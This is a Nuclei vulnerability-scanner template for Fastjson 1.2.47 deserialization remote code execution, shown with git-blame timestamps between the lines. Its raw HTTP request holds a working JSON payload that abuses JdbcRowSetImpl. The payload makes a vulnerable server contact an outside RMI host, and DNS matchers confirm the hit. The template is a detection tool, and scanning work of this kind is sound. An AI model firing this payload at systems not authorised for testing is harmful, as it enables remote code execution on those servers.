2021-10-30 11:17:35 +00:00
|
|
|
id: fastjson-1-2-47-rce
|
2021-10-10 22:53:52 +00:00
|
|
|
|
|
|
|
info:
|
2022-05-25 21:04:03 +00:00
|
|
|
name: Fastjson 1.2.47 - Remote Code Execution
|
2021-10-10 22:53:52 +00:00
|
|
|
author: zh
|
|
|
|
severity: critical
|
2022-05-25 21:04:03 +00:00
|
|
|
description: Fastjson 1.2.47 is susceptible to a deserialization remote code execution vulnerability.
|
2021-10-10 22:53:52 +00:00
|
|
|
reference:
|
|
|
|
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
|
|
|
|
- https://www.freebuf.com/vuls/208339.html
|
|
|
|
- https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
|
2021-10-12 05:57:50 +00:00
|
|
|
- https://github.com/wyzxxz/fastjson_rce_tool
|
2022-05-25 18:47:11 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
2023-10-14 11:27:55 +00:00
|
|
|
cvss-score: 10
|
2022-05-25 18:47:11 +00:00
|
|
|
cwe-id: CWE-77
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: rce,deserialization,oast,vulhub,fastjson
|
2021-10-10 22:53:52 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-10-10 22:53:52 +00:00
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST / HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{
|
|
|
|
"a":{
|
|
|
|
"@type":"java.lang.Class",
|
|
|
|
"val":"com.sun.rowset.JdbcRowSetImpl"
|
|
|
|
},
|
|
|
|
"b":{
|
|
|
|
"@type":"com.sun.rowset.JdbcRowSetImpl",
|
|
|
|
"dataSourceName":"rmi://{{interactsh-url}}/Exploit",
|
|
|
|
"autoCommit":true
|
|
|
|
}
|
|
|
|
}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2023-10-14 11:27:55 +00:00
|
|
|
part: interactsh_protocol # Confirms DNS Interaction
|
2021-10-10 22:53:52 +00:00
|
|
|
words:
|
|
|
|
- "dns"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
condition: and
|
|
|
|
words:
|
|
|
|
- "Bad Request"
|
2022-05-25 18:47:11 +00:00
|
|
|
- "400"
|
2023-10-19 13:13:52 +00:00
|
|
|
# digest: 490a00463044022005538cf7bac884796d630fc75708b13aa1a7747d4a7a27eceaa7d3d8c754856402205bcfa20a1013922f70350384f100648317c6860bd62b35dc1fefce4c928a7c92:922c64590222798bb761d5b6d8e72950
|